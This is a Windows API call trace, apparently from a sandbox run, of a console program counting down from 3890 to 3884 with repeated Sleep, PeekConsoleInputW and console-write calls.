[0196.524] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0196.524] lstrlenW (lpString="\x08\x08\x08\x083890") returned 8
[0196.524] GetConsoleOutputCP () returned 0x1b5
[0196.524] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083890", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0196.524] GetConsoleOutputCP () returned 0x1b5
[0196.524] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083890", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083890", lpUsedDefaultChar=0x0) returned 8
[0196.524] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0196.524] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0196.524] Sleep (dwMilliseconds=0x64)
[0196.631] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0196.632] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601f
[0196.632] Sleep (dwMilliseconds=0x64)
[0196.741] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0196.741] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601f
[0196.741] Sleep (dwMilliseconds=0x64)
[0196.850] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0196.850] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601f
[0196.850] Sleep (dwMilliseconds=0x64)
[0196.959] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0196.959] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601f
[0196.959] Sleep (dwMilliseconds=0x64)
[0197.068] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0197.069] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601f
[0197.069] Sleep (dwMilliseconds=0x64)
[0197.177] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0197.178] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601f
[0197.178] Sleep (dwMilliseconds=0x64)
[0197.287] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0197.287] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601f
[0197.287] Sleep (dwMilliseconds=0x64)
[0197.396] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0197.396] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd601f
[0197.396] Sleep (dwMilliseconds=0x64)
[0197.505] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0197.505] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6020
[0197.505] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083889") returned 8
[0197.505] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0197.505] __iob_func () returned 0x757a2900
[0197.506] _fileno (_File=0x757a2920) returned 1
[0197.506] _errno () returned 0x5507d8
[0197.506] _get_osfhandle (_FileHandle=1) returned 0x4c
[0197.506] _errno () returned 0x5507d8
[0197.506] GetFileType (hFile=0x4c) returned 0x2
[0197.506] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0197.506] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0197.506] lstrlenW (lpString="\x08\x08\x08\x083889") returned 8
[0197.506] GetConsoleOutputCP () returned 0x1b5
[0197.506] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083889", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0197.506] GetConsoleOutputCP () returned 0x1b5
[0197.506] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083889", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083889", lpUsedDefaultChar=0x0) returned 8
[0197.506] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0197.506] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0197.506] Sleep (dwMilliseconds=0x64)
[0197.614] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0197.615] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6020
[0197.615] Sleep (dwMilliseconds=0x64)
[0197.723] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0197.724] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6020
[0197.724] Sleep (dwMilliseconds=0x64)
[0197.833] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0197.833] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6020
[0197.833] Sleep (dwMilliseconds=0x64)
[0197.942] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0197.942] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6020
[0197.942] Sleep (dwMilliseconds=0x64)
[0198.051] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0198.051] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6020
[0198.051] Sleep (dwMilliseconds=0x64)
[0198.160] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0198.160] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6020
[0198.161] Sleep (dwMilliseconds=0x64)
[0198.270] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0198.270] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6020
[0198.270] Sleep (dwMilliseconds=0x64)
[0198.379] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0198.379] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6020
[0198.379] Sleep (dwMilliseconds=0x64)
[0198.488] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0198.488] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6021
[0198.488] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083888") returned 8
[0198.488] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0198.488] __iob_func () returned 0x757a2900
[0198.488] _fileno (_File=0x757a2920) returned 1
[0198.488] _errno () returned 0x5507d8
[0198.489] _get_osfhandle (_FileHandle=1) returned 0x4c
[0198.489] _errno () returned 0x5507d8
[0198.489] GetFileType (hFile=0x4c) returned 0x2
[0198.489] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0198.489] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0198.489] lstrlenW (lpString="\x08\x08\x08\x083888") returned 8
[0198.489] GetConsoleOutputCP () returned 0x1b5
[0198.489] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083888", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0198.489] GetConsoleOutputCP () returned 0x1b5
[0198.489] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083888", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083888", lpUsedDefaultChar=0x0) returned 8
[0198.489] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0198.489] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0198.490] Sleep (dwMilliseconds=0x64)
[0198.598] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0198.598] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6021
[0198.598] Sleep (dwMilliseconds=0x64)
[0198.707] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0198.707] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6021
[0198.707] Sleep (dwMilliseconds=0x64)
[0198.816] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0198.817] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6021
[0198.817] Sleep (dwMilliseconds=0x64)
[0198.925] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0198.925] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6021
[0198.925] Sleep (dwMilliseconds=0x64)
[0199.058] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0199.059] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6021
[0199.059] Sleep (dwMilliseconds=0x64)
[0199.164] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0199.164] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6021
[0199.164] Sleep (dwMilliseconds=0x64)
[0199.284] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0199.284] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6021
[0199.284] Sleep (dwMilliseconds=0x64)
[0199.424] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0199.424] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6021
[0199.424] Sleep (dwMilliseconds=0x64)
[0199.565] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0199.565] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6022
[0199.565] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083887") returned 8
[0199.565] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0199.565] __iob_func () returned 0x757a2900
[0199.565] _fileno (_File=0x757a2920) returned 1
[0199.565] _errno () returned 0x5507d8
[0199.565] _get_osfhandle (_FileHandle=1) returned 0x4c
[0199.565] _errno () returned 0x5507d8
[0199.565] GetFileType (hFile=0x4c) returned 0x2
[0199.565] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0199.565] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0199.566] lstrlenW (lpString="\x08\x08\x08\x083887") returned 8
[0199.566] GetConsoleOutputCP () returned 0x1b5
[0199.566] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083887", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0199.566] GetConsoleOutputCP () returned 0x1b5
[0199.566] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083887", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083887", lpUsedDefaultChar=0x0) returned 8
[0199.566] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0199.566] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0199.566] Sleep (dwMilliseconds=0x64)
[0199.705] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0199.705] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6022
[0199.705] Sleep (dwMilliseconds=0x64)
[0199.892] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0199.892] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6022
[0199.892] Sleep (dwMilliseconds=0x64)
[0200.034] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0200.034] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6022
[0200.034] Sleep (dwMilliseconds=0x64)
[0200.188] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0200.189] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6022
[0200.189] Sleep (dwMilliseconds=0x64)
[0200.375] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0200.375] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6022
[0200.375] Sleep (dwMilliseconds=0x64)
[0200.548] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0200.548] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6023
[0200.548] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083886") returned 8
[0200.548] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0200.548] __iob_func () returned 0x757a2900
[0200.548] _fileno (_File=0x757a2920) returned 1
[0200.548] _errno () returned 0x5507d8
[0200.549] _get_osfhandle (_FileHandle=1) returned 0x4c
[0200.549] _errno () returned 0x5507d8
[0200.549] GetFileType (hFile=0x4c) returned 0x2
[0200.549] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0200.549] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0200.549] lstrlenW (lpString="\x08\x08\x08\x083886") returned 8
[0200.549] GetConsoleOutputCP () returned 0x1b5
[0200.549] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083886", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0200.549] GetConsoleOutputCP () returned 0x1b5
[0200.549] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083886", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083886", lpUsedDefaultChar=0x0) returned 8
[0200.549] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0200.549] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0200.549] Sleep (dwMilliseconds=0x64)
[0200.734] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0200.734] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6023
[0200.734] Sleep (dwMilliseconds=0x64)
[0200.906] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0200.906] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6023
[0200.906] Sleep (dwMilliseconds=0x64)
[0201.077] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0201.078] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6023
[0201.078] Sleep (dwMilliseconds=0x64)
[0201.198] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0201.199] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6023
[0201.199] Sleep (dwMilliseconds=0x64)
[0201.399] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0201.399] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6023
[0201.399] Sleep (dwMilliseconds=0x64)
[0201.530] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0201.530] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6024
[0201.530] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083885") returned 8
[0201.530] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0201.530] __iob_func () returned 0x757a2900
[0201.530] _fileno (_File=0x757a2920) returned 1
[0201.530] _errno () returned 0x5507d8
[0201.531] _get_osfhandle (_FileHandle=1) returned 0x4c
[0201.531] _errno () returned 0x5507d8
[0201.531] GetFileType (hFile=0x4c) returned 0x2
[0201.531] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0201.531] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0201.531] lstrlenW (lpString="\x08\x08\x08\x083885") returned 8
[0201.531] GetConsoleOutputCP () returned 0x1b5
[0201.531] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083885", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0201.531] GetConsoleOutputCP () returned 0x1b5
[0201.531] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083885", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083885", lpUsedDefaultChar=0x0) returned 8
[0201.531] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0201.531] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0201.531] Sleep (dwMilliseconds=0x64)
[0201.670] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0201.670] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6024
[0201.670] Sleep (dwMilliseconds=0x64)
[0201.795] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0201.795] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6024
[0201.795] Sleep (dwMilliseconds=0x64)
[0201.935] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0201.935] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6024
[0201.936] Sleep (dwMilliseconds=0x64)
[0202.073] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0202.073] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6024
[0202.073] Sleep (dwMilliseconds=0x64)
[0202.169] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0202.170] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6024
[0202.170] Sleep (dwMilliseconds=0x64)
[0202.279] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0202.279] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6024
[0202.279] Sleep (dwMilliseconds=0x64)
[0202.388] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0202.388] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6024
[0202.388] Sleep (dwMilliseconds=0x64)
[0202.497] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0202.497] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6025
[0202.497] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083884") returned 8
[0202.497] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0202.497] __iob_func () returned 0x757a2900
[0202.497] _fileno (_File=0x757a2920) returned 1
[0202.497] _errno () returned 0x5507d8
[0202.497] _get_osfhandle (_FileHandle=1) returned 0x4c
[0202.497] _errno () returned 0x5507d8
[0202.497] GetFileType (hFile=0x4c) returned 0x2
[0202.497] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0202.497] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0202.498] lstrlenW (lpString="\x08\x08\x08\x083884") returned 8
[0202.498] GetConsoleOutputCP () returned 0x1b5
[0202.498] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083884", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0202.498] GetConsoleOutputCP () returned 0x1b5
[0202.498] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083884", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083884", lpUsedDefaultChar=0x0) returned 8
[0202.498] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0202.498] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0202.498] Sleep (dwMilliseconds=0x64)
[0202.606] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
